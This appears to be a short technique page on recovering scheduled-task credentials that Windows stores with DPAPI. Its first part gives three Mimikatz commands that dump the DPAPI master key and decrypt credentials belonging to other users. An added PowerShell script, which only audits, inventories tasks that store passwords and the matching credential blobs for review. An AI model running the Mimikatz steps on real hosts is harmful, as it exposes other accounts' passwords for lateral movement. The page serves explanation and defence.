Requirements

  • Local admin
  • Existing stored scheduled task credentials

Scheduled tasks may store the credentials of other users so that a task can run as that user without the user being logged in. The credentials are stored in C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials, encrypted with DPAPI.

To obtain the stored credentials:

  • Use Mimikatz to find the master key used to encrypt the credential: mimikatz dpapi::cred /in:c:\path\to\cred
  • Use mimikatz !sekurlsa::dpapi to dump the decrypted master key.
  • Decrypt credentials using: mimikatz dpapi::cred /in:c:\path\to\cred /masterkey:[master-key-hex]
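
Because any local admin can recover these credentials, it helps to know which tasks on a host store a password at all. The following PowerShell audit is an added example, not part of the original page; it assumes the built-in ScheduledTasks module and an elevated session, and only lists tasks and blob metadata.

```powershell
#Requires -RunAsAdministrator
# Added defensive example (not from the original page).
# Inventory scheduled tasks that keep a stored password, plus the DPAPI
# credential blobs in the SYSTEM profile, so the exposure can be reviewed.

$credDir = 'C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials'

# LogonType 'Password' means Task Scheduler saved the account's password.
$tasks = Get-ScheduledTask |
    Where-Object { $_.Principal.LogonType -eq 'Password' } |
    ForEach-Object {
        [pscustomobject]@{
            TaskPath = $_.TaskPath
            TaskName = $_.TaskName
            RunAs    = $_.Principal.UserId
            State    = $_.State
            # COM-handler actions have no Execute value and show up empty.
            Actions  = ($_.Actions |
                ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
        }
    }

# Credential blobs are hidden system files, so -Force is required.
$blobs = @()
if (Test-Path -LiteralPath $credDir) {
    $blobs = Get-ChildItem -LiteralPath $credDir -File -Force |
        Select-Object Name, Length, CreationTimeUtc, LastWriteTimeUtc
}

"Tasks with stored passwords: $(@($tasks).Count)"
$tasks | Sort-Object RunAs, TaskPath, TaskName | Format-Table -AutoSize -Wrap

"Accounts exposed through stored task credentials:"
$tasks | Group-Object RunAs |
    Select-Object @{ n = 'Account'; e = { $_.Name } }, @{ n = 'Tasks'; e = { $_.Count } } |
    Format-Table -AutoSize

"Credential blobs in the SYSTEM profile: $(@($blobs).Count)"
$blobs | Format-Table -AutoSize

# Heuristic: blobs with no matching task may be stale or come from another
# source; they deserve a manual look rather than automatic deletion.
if (@($blobs).Count -gt 0 -and @($tasks).Count -eq 0) {
    Write-Warning 'Credential blobs exist but no task stores a password; review them.'
}
```

Tasks reported here are candidates for running under a group managed service account or with the "Do not store password" option, either of which removes the stored credential from the host.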